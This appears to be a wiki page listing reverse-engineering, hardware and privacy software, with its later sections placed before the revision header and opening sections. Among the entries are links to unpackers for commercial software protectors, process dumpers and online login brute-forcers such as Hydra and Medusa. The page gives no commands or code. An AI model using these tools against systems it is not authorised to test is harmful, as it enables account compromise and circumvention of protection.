*[https://crdroid.net/ crDroid] - is a highly customized, free Android ROM, based on LineageOS, designed for gaming and customization.

*[https://www.ubuntu-touch.io/ Ubuntu Touch] - is a mobile operating system developed by the UBports community, based on the GNU/Linux operating system. It's a mobile version of Ubuntu, designed for touch-screen devices like smartphones and tablets, with a desktop-like experience.

----

====Tools for opening CAD or Boardview files====
'''Description''': Boardview is a type of file containing information about printed circuit boards, their components, used signals, test points and more. These files may have following extensions: .asc, .bdv, .brd, .bv, .cad, .cst, .gr, .f2b, .fz, .tvw and others.

*[https://pldaniels.com/flexbv5/ FlexBV] - Advanced FlexBV boardview software integrates your boardview files with PDF schematics to substantially ease the process of tracking down faults and understanding damaged boards

*[https://openboardview.org/ OpenBoardView] - is a Open Source Linux SDL/ImGui edition software for viewing .brd files, intended as a drop-in replacement for the "Test_Link" software and "Landrex".

*[https://www.cadence.com/ko_KR/home/tools/allegro-downloads-start.html Allegro®/OrCAD® FREE Physical Viewer] - is a free download that allows you to view and plot databases from Allegro PCB Editor, OrCAD PCB Editor, Allegro Package Designer, and Allegro PCB SI technology.

*[http://boardviewer.net/ BoardViewer] - is software intended for viewing various boardview file types like .tvw files and much more supported formats.

*CADview - simple old tool for viewing CAD files of PCB's (Windows). [[Media:CAD View.zip]] [https://www.virustotal.com/gui/file/9a64621ff34d8d674ba6580538908f4ea170fee9cc1cb700485bd41e3a3a42df VT link]

For resources to open in your favorite boardview program visit
[[Literature#Datasheets.2C_boardviews.2C_schematics.2C_manuals|Literature -> Datasheets boardviews & schematics]]

----

====Custom PCB Development Software====

=====Definition and Purpose=====
::'''Computer-Aided Design (CAD)''' refers to software that enables users to create, modify, analyze, or optimize designs in various fields such as architecture, mechanical engineering, and manufacturing. CAD is predominantly used for designing physical structures and components. It allows designers to visualize objects in two-dimensional (2D) or three-dimensional (3D) formats, facilitating precise planning and adjustments before production begins.

::In contrast, '''Electronic Design Automation (EDA)''' encompasses a suite of software tools specifically tailored for the design of electronic systems. EDA is crucial in industries like semiconductor manufacturing and printed ::circuit board (PCB) design. It focuses on automating the processes involved in designing electronic circuits at various levels—from high-level architectural descriptions down to detailed layouts.

::'''Integration Between CAD and EDA'''
::While CAD focuses on physical structures, EDA deals with electronic components. However, as products increasingly integrate both mechanical structures and electronic systems—such as IoT devices—the need for collaboration between CAD and EDA has grown. This integration allows designers to embed electronic circuits within mechanical models seamlessly.

=====Electronics Design Automation [[Wikipedia:Electronic_design_automation|(EDA)]] Suite for Developing Custom PCB's=====

*[https://www.kicad.org/ KiCAD] - is a free CAD suite for electronic design automation (EDA). It facilitates the design and simulation of electronic hardware. It features an integrated environment for schematic capture, PCB layout, manufacturing file viewing, ngspice-provided SPICE simulation, and engineering calculation.

*[https://easyeda.com/ EasyEDA] - EasyEDA is a web-based EDA tool suite that enables hardware engineers to design, simulate, share - publicly and privately - and discuss schematics, simulations and printed circuit boards. It can also be used [https://docs.easyeda.com/en/FAQ/Client/index.html offline].

*[https://fritzing.org/ Fritzing] - is an open-source hardware initiative that makes electronics accessible as a creative material for anyone.

*[https://librepcb.org/ LibrePCB] - is a free, cross-platform, easy-to-use electronic design automation suite to draw schematics and design printed circuit boards – for makers, students and professionals, from beginners to experts.

*[http://www.geda-project.org/ gEDA Project] - The gEDA project has produced and continues working on a full GPL'd suite and toolkit of Electronic Design Automation tools. These tools are used for electrical circuit design, schematic capture, simulation, prototyping, and production.

*[http://repo.hu/projects/pcb-rnd/ pcb-rnd] - is a free/open source, flexible, modular Printed Circuit Board editor. For design of professional and hobby boards. Is feature-rich and compatible. Has a long history, fast paced development, and big plansand is part of the coralEDA ecosystem.

=====Computer Aided Design [[Wikipedia:Computer-aided_design|(CAD)]] Mechanical Engineering=====

*[https://www.freecad.org/ FreeCAD] - is an open-source parametric 3D modeler made primarily to design real-life objects of any size. Parametric modeling allows you to easily modify your design by going back into your model history and changing its parameters.

*[https://openscad.org/ OpenSCAD] - is software for creating solid 3D CAD objects. It is free software and available for Linux/UNIX, MS Windows and Mac OS X.

*[https://brlcad.org/ BRL-CAD] - is a powerful open source cross-platform solid modeling system that includes interactive geometry editing, high-performance ray-tracing for rendering and geometric analysis, a system performance analysis benchmark suite, geometry libraries for application developers, and more than 30 years of active development.

*[https://solvespace.com/index.pl SolveSpace] - is a free (GPLv3) parametric 3d CAD tool. Modeling 3d parts, modeling 2d parts, 3d-printed parts, preparing CAM data, mechanism design, plane and solid geometry.

----
====Other software====

=====Display Driver Utilities (Windows)=====

*[https://github.com/lostindark/DriverStoreExplorer Driver Store Explorer (RAPR)] - is a tool used to manage the Windows driver store, a repository of driver packages that Windows uses to install and update hardware drivers. It helps users list, add, install, delete, and export driver packages, especially those from third-party vendors.

*[https://github.com/Wagnard/display-drivers-uninstaller DDU] - is a driver removal utility that can help you completely uninstall AMD/NVIDIA/Intel graphics card drivers and packages from your system, without leaving leftovers behind (including registry keys, folders and files, and driver store).

*[https://www.techpowerup.com/nvcleanstall/ NVCleanstall] - is a free utility from TechPowerUp that allows you to customize your NVIDIA GeForce driver installation. It enables you to remove unnecessary components and install only the drivers you need, potentially optimizing your system performance and minimizing "bloatware".

*[https://github.com/GSDragoon/RadeonSoftwareSlimmer Radeon Software Slimmer] - is a utility to trim down the bloat with Radeon Software for AMD GPUs on Microsoft Windows.

*[https://forums.guru3d.com/threads/nvslimmer-nvidia-driver-slimming-utility.423072/ NVSlimmer] - is a third-party utility created by uKER and available on guru3d.com that allows users to remove unwanted components from NVIDIA graphics driver installations, effectively "trimming" down the install base. It's not an official Nvidia utility.

=====Host Based Firewall [Windows FOSS]=====
*[https://github.com/tnodir/fort Fort Firewall] - is a very practical firewall that allows you to manage your privacy and security in Windows simply and flexibly. This open-source tool is a perfect alternative to the standard Windows firewall, giving you a lot of customizable features so you can work with your files and programs more comfortably.

=====Web Browsing=====
*[https://www.mozilla.org/firefox/ Mozilla Firefox] - is a free, open source web browser developed by the Mozilla Foundation and Mozilla Corporation in 2004. The Firefox web browser can be used with Windows, Mac and Linux operating systems, as well as Android and iOS mobile devices.

::Extensions & Configurations
:::*[https://github.com/hackademix/noscript NoScript] - The popular NoScript Security Suite browser extension.
:::*[https://github.com/ChrisAntaki/disable-webrtc-firefox WebRTC block] - WebRTC leaks your actual IP addresses from behind your VPN, by default. With this extension you can disable it.
:::*[https://github.com/arkenfox/user.js/ user.js] - Firefox privacy, security and anti-tracking: a comprehensive user.js template for configuration and hardening.
:::*[https://github.com/yokoffing/Betterfox Betterfox] - Firefox speed, privacy, and security: a user.js template for configuration. Your favorite browser, but better.
:::*[https://github.com/gorhill/uBlock uBlock] - Help users neutralize privacy-invading ads CPU and memory-efficient.
:::*[https://github.com/sereneblue/chameleon Chameleon] - is a WebExtension port of the popular Random Agent Spoofer. Spoofs a lot of client fingering techniques and adds security.
:::*[https://github.com/EFForg/privacybadger Privacy Badger] - is a browser extension that automatically learns to block invisible trackers. PB is made by the leading digital rights nonprofit EFF to stop companies from spying on you.

*[https://www.torproject.org/ Tor Browser] - [[Wikipedia:Tor_(network)|Tor]] (The Onion Router) is a network that anonymizes web traffic to provide truly private web browsing. The Tor Browser hides your IP address and browsing activity by redirecting web traffic through a series of different routers known as nodes.

*[https://guardianproject.info/apps/org.torproject.android/ Orbot for Android] - is a free proxy app that empowers other apps to use the internet more securely. Orbot uses Tor to encrypt your Internet traffic and then hides it by bouncing through a series of computers around the world. Tor is free software and an open network that helps you defend against a form of network surveillance that threatens personal freedom and privacy, confidential business activities.

======Public Networks======

*[https://www.torproject.org/ [[Wikipedia:Tor_(netwerk)|Tor]]] - is an open-source privacy network that enables anonymous web browsing. The worldwide Tor computer network uses secure, encrypted protocols to ensure that users' online privacy is protected.

*[https://geti2p.net/ The Invisible Internet Project [[Wikipedia:I2P|(I2P)]]] - is a fully encrypted private network layer. It protects your activity and location. Every day people use the network to connect with people without worry of being tracked or their data being collected.

*[https://www.freenet.de/ FreeNet] - is a peer-to-peer platform for censorship-resistant, anonymous communication. It uses a decentralized distributed data store to keep and deliver information, and has a suite of free software for publishing and communicating on the Web without fear of censorship.

*[https://zeronet.io/ ZeroNet] - Open, free and uncensorable websites, using Bitcoin cryptography and BitTorrent network · We believe in open, free, and uncensored network.

*[https://lokinet.org/ Lokinet] - is an onion-router that lets you access the internet anonymously. Built on LLARP, the fastest onion-routing protocol in the world.

*[https://nymtech.net/ Nym] - protect internet traffic by routing it through a decentralised mixnet that can be accessed anonymously using zk-nyms.

=====Email Clients / Email Encryption Standards=====
*[https://www.thunderbird.net/ Mozilla ThunderBird] - is a free, open-source, cross-platform application for managing email, news feeds, chat, and news groups. It is a local email application, meaning it installs and runs as a client on your device, being rather than browser or web-based. [https://support.mozilla.org/en-US/kb/openpgp-thunderbird-howto-and-faq FAQ How to implement OpenPGP in Thunderbird].

*[https://www.openpgp.org/ OpenPGP] - is the most widely used email encryption standard. It is defined by the OpenPGP Working Group of the Internet Engineering Task Force (IETF) as a Proposed Standard in RFC 4880. OpenPGP was originally derived from the PGP software, created by Phil Zimmermann.

*[https://www.gnupg.org/ GnuPG] - is a complete and free implementation of the OpenPGP standard as defined by RFC4880 (also known as PGP). GnuPG allows you to encrypt and sign your data and communications; it features a versatile key management system, along with access modules for all kinds of public key directories. GnuPG, also known as GPG, is a command line tool with features for easy integration with other applications.

*[https://wiki.gnome.org/Apps/Evolution Evolution] - is a personal information management application that provides integrated mail, calendaring and address book functionality. Check the Privacy Policy sub-page for a general information about user data usage. [https://riseup.net/en/email/clients/evolution FAQ How to implement OpenPGP in Evolution].

*[https://neomutt.org/ NeoMutt] - is a command line mail reader (or MUA ). It's a fork of Mutt with added features.

=====Chat Applications / Platforms=====
*[https://www.teamspeak.com/ TeamSpeak] - is a VoIP application for audio communication between users via a chat channel, similar to a video meeting. Cross-platform with military-grade security, lag-free performance, privacy and complete control.
*[https://github.com/RetroShare/RetroShare RetroShare] - is a Free and Open Source cross-platform, Friend-2-Friend and secure decentralised communication platform.
*[https://github.com/JFreegman/toxic Toxic] - is a Tox-based P2P messenger that provides end-to-end encrypted communications without the use of centralized servers. It supports text messaging, file sharing, 1-on-1 voice and video calls, private audio conferences, public and private text group chats.
*[https://www.jabber.org/ Jabber] - is a original messaging service based on [https://xmpp.org/ XMPP] and has been continuously offered for free since 1999.
::XMPP clients & extensions
:::*[https://xmpp.org/software/ XMPP client list] - is a list of XMPP clients composed by XMPP itself.
:::*[https://otr.cypherpunks.ca/ Off-the-Record Messaging (OTR) for XMPP] - is a cryptographic protocol that provides encryption for instant messaging conversations. OTR uses a combination of AES symmetric-key algorithm with 128 bits key length, the Diffie–Hellman key exchange with 1536 bits group size, and the SHA-1 hash function.
:::*[https://omemo.im/ OMEMO.IM] is a free, secure XMPP-based chat client available for Android and Windows that utilizes the OMEMO (Multi-End Message and Object) end-to-end encryption protocol.
:::*[https://xmpp.org/extensions/xep-0384.html XEP-0384: OMEMO Encryption] defines an end-to-end encryption protocol for XMPP messaging that uses double-ratchet and key-exchange techniques to securely encrypt one-to-one and group chats across multiple devices.
*[https://getsession.org/ Session] - Session is an end-to-end encrypted messenger that minimises sensitive metadata, designed and built for people who want absolute privacy and freedom from any form of surveillance.
*[https://github.com/briar Briar] - is a messaging app designed for activists, journalists, and anyone else who needs a safe, easy and robust way to communicate. Unlike traditional messaging apps, Briar doesn't rely on a central server - messages are synchronized directly between the users' devices.
*[https://matrix.org/ Matrix] - is an open network for secure, decentralised communication.
*[https://discord.com/ Discord] - is a voice, video and text communication service used by over a hundred million people to hang out and talk with their friends and communities.
::Discord client advice
:::*1. Stop using the installed electron PC based version. Use the web version.
:::*2. Android stock client is spoiled with rubbish code slowing down your SoC and sending loads of analytics, use [https://github.com/Aliucord/Aliucord Aliucord] instead (but carefully read the readme.md, ToS issue).

=====File Archiver Utilities=====

*[https://www.7-zip.org/ 7-Zip] - is a free and open source file archiver.

*[https://github.com/M2Team/NanaZip NanaZip] - is a free and open source file archiver intended for the modern Windows experience.

*[https://peazip.github.io/ PeaZip] - is a free and open source file archiver, similar to WinRar, WinZip, and 7-Zip.

=====Disk Encryption Software=====

*[https://guardianproject.info/archive/luks/ Linux Unified Key Setup (LUKS)] - The Linux Unified Key Setup (LUKS) is a disk encryption specification created by Clemens Fruhwirth in 2004 and originally intended for Linux. LUKS implements a platform-independent standard on-disk format for use in various tools

*[https://www.veracrypt.fr/code/VeraCrypt/ VaraCrypt] - VeraCrypt is free open-source disk encryption software for Windows, Mac OS X and Linux. Support for on-the-fly encryption [[Wikipedia:Disk_encryption|(OTFE)]].

=====Image Manipulation Tools=====

*[https://www.gimp.org/ Gimp] - is the official website of the GNU Image Manipulation Program (GIMP). GIMP is a cross-platform image editor available for GNU/Linux, macOS, Windows and more operating systems. It is free software, you can change its source code and distribute your changes.

*[https://www.getpaint.net/ Paint.net] - is image and photo editing software for PCs that run Windows. It features an intuitive and innovative user interface with support for layers, unlimited undo, special effects, and a wide variety of useful and powerful tools. An active and growing online community provides friendly help, tutorials, and plugins.

=====Video Editing Software / 3D Creation / Dec, Enc, Transcode, etc / Media Players=====

*[https://www.blackmagicdesign.com/products/davinciresolve DaVinci Resolve] - is the world’s only solution that combines editing, color correction, visual effects, motion graphics and audio post production all in one software tool! Its elegant, modern interface is fast to learn and easy for new users, yet powerful for professionals.

*[https://shotcut.org/ Shotcut] - is a free, Open Source, cross-platform video editor for Windows, Mac and Linux. Major features include support for a wide range of formats; no import required meaning native timeline editing; Blackmagic Design support for input and preview monitoring; and resolution support to 4k.

*[https://www.openshot.org/nl/ OpenShot] - is a free, Open Source video editor for Linux, Mac, and Windows. We designed OpenShot to be an easy to use, quick to learn, and surprisingly powerful video editor. Easily cut, slice, and edit any video or film.

*[https://www.blender.org/ Blender] - is the free and open source 3D creation suite. It supports the entirety of the 3D pipeline—modeling, rigging, animation, simulation, rendering, compositing and motion tracking, even video editing and game creation.

*[https://ffmpeg.org/ FFMPEG (Command line interface to convert different formats)] - FFmpeg is the leading multimedia framework, able to decode, encode, transcode, mux, demux, stream, filter and play pretty much anything that humans and machines have created. It supports the most obscure ancient formats up to the cutting edge.

*[https://handbrake.fr/features.php HandBrake] - is an Open Source video transcoder available for Linux, Mac, and Windows. Everyone can use HandBrake to make videos for free. HandBrake is a post-production tool. Its primary purpose is to convert videos from supported source formats to MP4 or MKV format.

*[https://www.videolan.org/ VLC Player] - VLC Media Player (also known as VLC) is a free, open source multimedia player developed by VideoLAN Organization. It is one of the oldest (released for the first time in February 2001) free, portable, cross-platform multimedia player. You can use it to play all popular multimedia files and also DVDs, CDs, VCDs and other streaming protocols.

=====Video Recording and Live Streaming=====

*[https://obsproject.com/ OBS (Open Broadcaster Software)] - is free and Open Source software for video recording and live streaming.

*[https://streamlabs.com/ StreamLabs] - is free live streaming and recording software for Twitch, YouTube, and more for Windows or Mac.

====Search engine (self-hosted & open-source)====
*[https://github.com/searxng/searxng SearXNG] - is a free and open-source metasearch engine that prioritizes user privacy. It works by aggregating results from various search engines, such as Google, Bing, and DuckDuckGo, without tracking or profiling users. Essentially, it acts as a privacy-respecting proxy for your searches.

*[https://github.com/neon-mmd/websurfx websurfx] - is a free and open-source metasearch engine written in Rust, designed to provide a fast, secure, and privacy-respecting alternative to search engines like SearX. It aggregates results from other search engines without displaying ads, focusing on speed, security, and user privacy.

*[https://github.com/mwmbl/mwmbl Mwmbl] - is a non-profit, open source search engine where the community determines the rankings. We aim to be a replacement for commercial search engines such as Google and Bing.

*[https://github.com/yacy/yacy_search_server YaCy] - is a free, open-source, peer-to-peer (P2P) search engine that operates without a central authority. It differs from traditional search engines by allowing users to create their own local or global indexes and share them with other users, creating a decentralized network.

====Social Network / Fediverse (self-hosted & open-source)====

*[https://joinmastodon.org/ Mastodon] - is a free and open-source software for running self-hosted social networking services. It has microblogging features similar to Twitter, which are offered by a large number of independently run nodes, known as instances or servers, each with its own code of conduct, terms of service, privacy policy, privacy options, and content moderation policies. [https://github.com/mastodon/mastodon Github repo].

*[https://github.com/pixelfed/pixelfed PixelFed] - is a decentralized, open-source social media platform focused on photo and video sharing, designed as an alternative to Instagram. It utilizes the ActivityPub protocol, allowing users to interact with accounts on other Pixelfed servers as if they were on the same platform.

*[https://github.com/movim/movim Movim] - is a federated blogging and chat platform that acts as a web frontend for the XMPP protocol.

*[https://github.com/emilebosch/awesome-fediverse Big fediverse list] - is a curated list of more decentralized social networks.

====Privacy-focused Software Directory====

*[https://prism-break.org/ prism-break.org] - is a website that provides a curated list of free and open-source software (FOSS) alternatives to proprietary, surveillance-prone services. It aims to help users opt out of global data surveillance programs—like PRISM, XKeyscore, and Tempora—by promoting privacy-respecting technology for operating systems, browsers, and communication tools.

==Education==

:[[:Literature|See the literature wiki page for all the resources.]]

Software Tools

2026-04-04T17:57:16Z

Polymorphic7: add Privacy-focused Software Directory

[[File:Software_wiki_banner.png|frameless|1280x300px]]

Disassemblers, decompilers, software development tools, pcb development suites, cryptographic tools, and other reverse engineering software. If you used it while reverse engineering, list it here!
==Tool Index==
 

====RF Signals Analysis====

*[https://github.com/jopohl/urh Universal Radio Hacker] - tool to analyze and extract data from SDR-captured radio signals (especially pilots, [[Wikipedia:ISM_radio_band|ISM RF]] devices, etc). See youtube for tutorials and examples.

*[https://www.gnuradio.org/ GNU Radio] - toolkit that provides signal processing blocks to implement software-defined radios and signal processing systems.

*[https://github.com/cjcliffe/CubicSDR CubicSDR] - is a cross-platform Software-Defined Radio application which allows you to navigate the radio spectrum and demodulate any signals you might discover.

*[https://github.com/audacity/audacity Audacity] - is a audio editor that can be used to cleanup the radio waves captured by a [[Wikipedia:Software-defined_radio|SDR]] or Software Defined Radio. (Example: Start Audacity -> Import –> Raw Data -> Radio Wave File)

----

====Firmware Analysis====

*[https://github.com/ReFirmLabs/binwalk binwalk] - Binwalk is a fast, easy to use tool for analyzing, reverse engineering, and extracting firmware images.

*[https://github.com/attify/firmware-analysis-toolkit FAT] - is a toolkit built in order to help security researchers analyze and identify vulnerabilities in IoT and embedded device firmware.

*[https://github.com/e-m-b-a/emba EMBA] - is designed as the central firmware analysis tool for penetration testers and product security teams. It supports the complete security analysis process starting with firmware extraction, doing static analysis and dynamic analysis via emulation and finally generating a web report.

*[https://github.com/rampageX/firmware-mod-kit Firmware Modification Kit] - is a collection of scripts and utilities to extract and rebuild linux based firmware images.

*[https://github.com/craigz28/firmwalker Firmwalker] - is a script for searching the extracted firmware file system for goodies!

====Setup Extractors / Overlay Unpackers / Virtualization Wrappers====

*[https://innounp.sourceforge.net/ innounp] - the Inno Setup Unpacker.

*[https://github.com/Bioruebe/UniExtract2 Universal Extractor 2 (UniExtract2)] - is a tool designed to extract files from any type of extractable file.

*[https://github.com/activescott/lessmsi lessmsi] - a tool to view and extract the contents of an Windows Installer (.msi) file.

*[https://github.com/crackinglandia/fuu FUU] - [F]aster [U]niversal [U]npacker.

=====Themida Reverse Engineering=====

*[https://github.com/ergrelet/themida-unmutate themida-unmutate] - is a static deobfuscator for Themida, WinLicense and Code Virtualizer 3.x's mutation-based obfuscation.

*[https://github.com/sodareverse/TDE TDE] - is a devirtualization engine for Themida. Supported FISH VMA versions: 2.2.5.0, 2.2.6.0, 2.2.7.0.

*[https://github.com/ergrelet/unlicense unlicense] - is a dynamic unpacker and import fixer for Themida/WinLicense 2.x and 3.x mostly used for malware-analysis.

=====VMProtect Reverse Engineering=====

======VMProtect 2======

*[https://git.back.engineering/vmp2/ vmp2] - Resources provided by Back Engineering Labs regarding VMProtect 2 Reverse Engineering (x64 PE Only).
*vmemu (VMProtect 2 Virtual Machine Handler Emulation)
*vmassembler (VMProtect 2 Virtual Instruction Assembler)
*vmprofiler (VMProtect 2 Virtual Machines Profiler Library)
*vmprofiler-cli (VMProtect 2 CLI Virtual Machine Information Displayer)
*vmhook (VMProtect 2 Virtual Machine Hooking Library)
*vmprofiler-qt (VMProtect 2 Qt Virtual Instruction Inspector)
*um-hook (VMProtect 2 Usermode Virtual Instruction Hook Demo)
*vmdevirt (VMProtect Devirtualization)

======VMProtect 3======

*[https://git.back.engineering/vmp3/ vmp3] - Resources provided by Back Engineering Labs regarding VMProtect 3 Reverse Engineering (x64 PE Only).
*vmdevirt (VMProtect 3 Static Devirtualization)
*vmprofiler (VMProtect 3 Virtual Machines Profiler Library)
*vmemu (VMProtect 3 Virtual Machine Handler Emulation)

=====Code Virtualizer (Oreans Technologies)=====

*[https://github.com/pakt/decv devc] - ia s decompiler for Code Virtualizer 1.3.8 (Oreans).
*[https://gdtr.wordpress.com/2012/10/03/decv-a-decompiler-for-code-virtualizer-by-oreans/ decv] - [blog post] a decompiler for Code Virtualizer by Oreans.
*[https://github.com/67-6f-64/AntiOreans-CodeDevirtualizer AntiOreans-CodeDevirtualizer] - is a proof-of-concept devirtualization engine for Themida/Oreans-CodeDevirtualizer.

=====Enigma Protector=====

*[https://github.com/mos9527/evbunpack evbunpack] - is a Enigma Virtual Box Unpacker. Supported versions: 11.00, 10.70, 9.70, and 7.80.

======OllyDbg Scripts======
*[https://github.com/ThomasThelen/OllyDbg-Scripts/blob/master/Enigma/Enigma%20Protector%201.90%20-%203.xx%20Alternativ%20Unpacker%20v1.0.txt Enigma Protector 1.90–3.xx Unpacker]
*[https://github.com/ThomasThelen/OllyDbg-Scripts/blob/master/Enigma/Enigma%20Protector%204.xx%20VM%20API%20Fixer%20v0.5.0.txt Enigma Protector 4.xx VM API Fixer]

=====Generic Code Virtualizer=====

*[https://github.com/jnraber/VirtualDeobfuscator VirtualDeobfuscator] - is a reverse engineering tool for virtualization wrappers.

====Reverse Engineering Toolkit AIO====
=====Windows‑focused=====
*[https://github.com/Jakiboy/ReVens ReVens] - is a Windows-based Reverse Engineering Toolkit "All-In-One", Built for Security (Malware analysis, Penetration testing) & Educational purposes.
*[https://github.com/mentebinaria/retoolkit retoolkit] - is a collection of tools you may like if you are interested in reverse engineering and/or malware analysis on x86 and x64 Windows systems.
*[https://github.com/byte2mov/re-kit-2.0 re-kit 2.0] - is a reverse engineering toolkit made for fighting malware and analyzing programs.
*[https://github.com/zer0condition/ReverseKit ReverseKit] - is a comprehensive toolkit designed to aid reverse engineers in the process of dynamic RE.

=====Android‑focused=====
*[https://github.com/RevEngiSquad/revengi-app RevEngi] - is a all-in-one toolkit for reverse engineering: Smali Grammar, DexRepair, Flutter Analysis and much more...

====Binary PE Analysis / Editor (Windows)====

*[https://web.archive.org/web/20210331144912/https://protectionid.net/ ProtectionID] - Great little tool to scan a Windows binary payload for overlays and packers. [[Media:ProtectionId.690.December.2017.zip]] [https://www.virustotal.com/gui/file/26c54eb376183d508ee129531728f9e01d30f0df29d7621f390e8f0ea6a1c79c/community VT link], pw: recessim.com

*[https://github.com/horsicq/Detect-It-Easy Detect-It-Easy] - abbreviated "DIE" is a program for determining types of files. "DIE" is a cross-platform application, apart from Windows version there are also available versions for Linux and Mac OS.

*[https://www.mitec.cz/exe.html MiTeC Portable Executable Reader/Explorer] - is a tool that reads and displays executable file properties and structures. It is compatible with PE32 (Portable Executable), PE32+ (64bit), NE (Windows 3.x New Executable) and VxD (Windows 9x Virtual Device Driver) file types. .NET executables are supported too.

*[https://github.com/ExeinfoASL/ASL ExeInfoPe] - is a tool that can detect packers, compilers, protectors, .NET obfuscators, PUA applications.

*[https://github.com/hasherezade/pe-bear PE-bear] - is a Portable Executable reversing tool with a friendly GUI using the Capstone Engine and is Open Source!

*[https://ntcore.com/?page_id=388 CFF Explorer] - is a PE editor called CFF Explorer and a process viewer with a lot of features.

*[https://web.archive.org/web/20220331063153/http://www.rdgsoft.net/ RDG Packer Detector] - is a detector for packers, cryptors, compilers, installers.

*[https://github.com/petoolse/petools/ PE Tools] - is a portable executable (PE) manipulation toolkit.

*[https://github.com/zedxxx/rccextended RccExtended] - is a resource compiler and decompiler for Qt binaries (files with the .rcc extension).

====Hex Editors====

*[https://github.com/WerWolv/ImHex ImHex] - is a Hex Editor for Reverse Engineers, Programmers and people who value their retinas when working at 3 AM.

*[https://mh-nexus.de/en/hxd/ HxD] - is a carefully designed and fast hex editor which, additionally to raw disk editing and modifying of main memory (RAM), handles files of any size.

*[https://www.x-ways.net/winhex/ WinHex] - is in its core a universal hexadecimal editor, particularly helpful in the realm of computer forensics, data recovery, low-level data processing, and IT security.

*[https://malcat.fr/index.html MalCat] - is a feature-rich hexadecimal editor / disassembler for Windows and Linux targeted to IT-security professionals. Inspect more than 40 binary file formats, dissassemble and decompile different CPU architectures, extract embedded files and scan for Yara signatures or anomalies in a fast and easy-to-use graphical interface.

====Pattern Matching / Pattern Searching====

*[https://github.com/VirusTotal/yara Yara] - is a pattern matching swiss knife in the IT Security Researchers branch.

*[https://github.com/BurntSushi/ripgrep ripgrep (rg)] - is a line-oriented search tool that recursively searches the current directory for a regex pattern. By default, ripgrep will respect gitignore rules and automatically skip hidden files/directories and binary files.

*[https://linux.die.net/man/1/grep grep] - searches the named input FILEs (or standard input if no files are named, or if a single hyphen-minus (-) is given as file name) for lines containing a match to the given PATTERN. By default, grep prints the matching lines.

*[https://github.com/stefankueng/grepWin grepWin] - is a simple yet powerful search and replace tool which can use regular expressions to do its job. This allows to do much more powerful searches and replaces.

*[https://astrogrep.sourceforge.net/ AstroGrep] - is a Microsoft Windows grep utility. Grep is a UNIX command-line program which searches within files for keywords. AstroGrep supports regular expressions, versatile printing options, stores most recently used paths and has a "context" feature which is very nice for looking at source code.

====Comparison Tools (Binary differences)====

*[https://github.com/joxeankoret/diaphora Diaphora] - is the most advanced Free and Open Source program diffing tool.

*[https://github.com/google/bindiff BinDiff] - is an open-source comparison tool for binary files to quickly find differences and similarities in disassembled code.

*[https://github.com/clearbluejar/ghidriff Ghidriff] - is a command-line binary diffing tool that uses Ghidra to identify differences between two binaries.

*[https://github.com/quarkslab/qbindiff QBinDiff] - is an experimental binary diffing tool addressing the diffing as a Network Alignement Quadratic Problem.

*[https://book.rada.re/tools/radiff2/binary_diffing.html radiff2] - is a binary diffing utility that is part of the radare2 framework.

*[https://github.com/bmaia/binwally binwally] - is a binary and directory tree comparison tool using Fuzzy Hashing concept (ssdeep).

====IAT Reconstructors (Windows)====

*[https://github.com/x64dbg/Scylla NtQuery Scylla] - is a Windows Portable Executable imports reconstructor Open Source and part of x64dbg.

====Process Monitors (Windows)====

*[https://github.com/winsiderss/systeminformer/ System Informer] - is a free, powerful, multi-purpose tool that helps you monitor system resources, debug software and detect malware.

*[https://docs.microsoft.com/en-us/sysinternals/downloads/process-explorer Process Explorer (by Microsoft Sysinternals)] - is an advanced system monitoring tool by Microsoft Sysinternals that provides detailed real-time information about running processes, including their dependencies, resource usage, and open handles or DLLs.

*[https://docs.microsoft.com/en-us/sysinternals/downloads/procmon Process Monitor (by Microsoft Sysinternals)] - is a real-time monitoring tool by Microsoft Sysinternals that captures and displays detailed system activity related to file system, registry, process, and thread operations for advanced troubleshooting and diagnostics.

====Process Dumpers (Windows)====

*[https://github.com/glmcdona/Process-Dump Process Dump (pd)] - is a Windows reverse-engineering tool to dump malware memory components back to disk for analysis. It uses an aggressive import reconstruction approach to make analysis easier, and supports 32 and 64 bit modules. Dumping of regions without PE headers is supported and in these cases PE headers and import tables will automatically be generated.

*[https://github.com/EquiFox/KsDumper KsDumper] - is a tool for dumping processes using the power of kernel space.

====API monitoring ring3 (Windows)====

*[http://jacquelin.potier.free.fr/winapioverride32/ WinAPIOverride] - is an advanced api monitoring software for 32 and 64 bits processes. You can monitor and/or override any function of a process.

*[http://www.rohitab.com/apimonitor Rohitab API Monitor] - is a free tool that lets you monitor and control API calls made by applications and services. Its a powerful tool for seeing how applications and services work or for tracking down problems that you have in your own applications.

*[https://github.com/hasherezade/tiny_tracer tiny_tracer] - is a Pin Tool for tracing API calls including parameters of selected functions, selected instructions RDTSC, CPUID, INT, inline system calls inc parameters of selected syscalls and more.

====Hashing & Crypto====
These tools are used in authorized security audits to uncover flaws in hashing or cryptographic logic, as well as to detect backdoors or undocumented features. They are also commonly employed in crackme challenges to help improve reverse engineering skills. 
It includes support for a wide range of cryptographic algorithms and hash functions, such as AES, Blowfish, TEA family, RC2–RC6, Twofish, DES variants, MARS, and hashing standards like SHA-2, RIPEMD, TIGER, WHIRLPOOL, CRC variants, and HAVAL with multiple rounds and output lengths.

*[https://webscene.ir/distro/AT4RE/Tools Keygener Assistant v2.1.2] [[File:Keygener Assistant v2.1.2.zip]] - is a tool that combines several functions to facilitate the task and save time during the analysis of an algorithm.

*[https://webscene.ir/tools/show/SnD-Reverser-Tool-1.4 SnD Reverser Tool 1.4 (404)] [[File:SnD Reverser Tool 1.4.zip]] - is a cryptographic companion tool designed to support reverse engineering efforts, offering a wide range of features including hash function analysis, base conversions, and support for various encryption standards.

====Password cracking====
Most embedded devices, whether connected via wireless or wired interfaces, store credentials such as local account passwords, service keys, and API keys. If you need to evaluate or audit the cryptographic mechanisms protecting these credentials, password-cracking tools are essential.

Offline
*[https://github.com/hashcat/hashcat Hashcat] - is world's fastest and most advanced password recovery utility, supports many hash algorithms (MD5, SHA1, NTLM, bcrypt, etc).

*[https://github.com/openwall/john John the Ripper jumbo] - is a advanced offline password cracker, which supports hundreds of hash and cipher types, and runs on many operating systems, CPUs, GPUs, and even some FPGAs.

Online (network based bruteforce in LAN).
*[https://github.com/vanhauser-thc/thc-hydra Hydra / THC Hydra] - is a parallelized network login cracker built into various operating systems like Kali Linux, Parrot and other major penetration testing environments. It was created as a proof of concept tool, for security researchers to demonstrate how easy it can be to crack logins.

*[https://github.com/jmk-foofus/medusa Medusa] - is a speedy, parallel, and modular, login brute-forcer.

*[https://github.com/lanjelot/patator Patator] - is a multi-purpose brute-forcer, with a modular design and a flexible usage. Also support various offline brute force methods like; unzip_pass, keystore_pass, umbraco_crack.

